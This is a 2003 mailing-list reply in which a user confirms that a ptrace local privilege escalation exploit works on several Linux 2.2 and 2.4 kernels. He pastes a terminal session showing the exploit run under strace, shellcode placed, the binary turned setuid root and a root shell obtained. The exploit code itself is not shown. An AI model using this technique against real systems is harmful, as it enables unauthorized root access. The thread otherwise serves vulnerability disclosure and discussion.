Re: Kernels 2.2 and 2.4 exploit (ALL VERSION WHAT I HAVE TESTED UNTILL NOW!)

From: BODA Karoly jr. (woockie@expressz.com)
Date: Wed Mar 19 2003 - 11:00:01 EST


On Wed, 19 Mar 2003, BODA Karoly jr. wrote:

> Well, for me it didn't work on those kernels (all were i386 "of
> course"):
> 2.4.19-pre6aa1
> 2.4.21-pre4aa1
> 2.4.21-pre4aa3
> 2.2.16pre7

        I must fix this. The exploit WORKS on those kernels. :( I tried
lots of times (>100) to simply run the exploit and it didn't work. But when I
wanted to trace what the difference was, it was working. :( I didn't try
the other versions; I think it will work too... strace of course is not
setuid root. Here it goes:

woockie@death:~/tmp$ ls -l ptrace
-rwxr-xr-x 1 woockie woockie 9031 Mar 19 14:59 ptrace
woockie@death:~/tmp$ strace -o /dev/null -f -F ./ptrace
Process 4003 attached
[+] Attached to 4004
[+] Signal caught
[+] Shellcode placed at 0x4000da2d
umovestr: Input/output error
[+] Now wait for suid shell...
Process 4005 attached
Process 4002 suspended
Process 4003 detached
PTRACE_ATTACH: Operation not permitted
Too late?
PTRACE_ATTACH: Operation not permitted
Too late?

[1]+ Stopped strace -o /dev/null -f -F ./ptrace
woockie@death:~/tmp$ killall strace
woockie@death:~/tmp$ ls -l ptrace
-rwsr-sr-x 1 root root 9031 Mar 19 14:59 ptrace
woockie@death:~/tmp$ ./ptrace
root@death:~/tmp#

-- 
						Woockie
..."what is there in this world that makes living worthwhile?"
Death thought about it. "CATS," he said eventually, "CATS ARE NICE."
			           (Terry Pratchett, Sourcery)

P.S.: Sorry for the previous mail :( Can anyone explain to me why this works only this way?
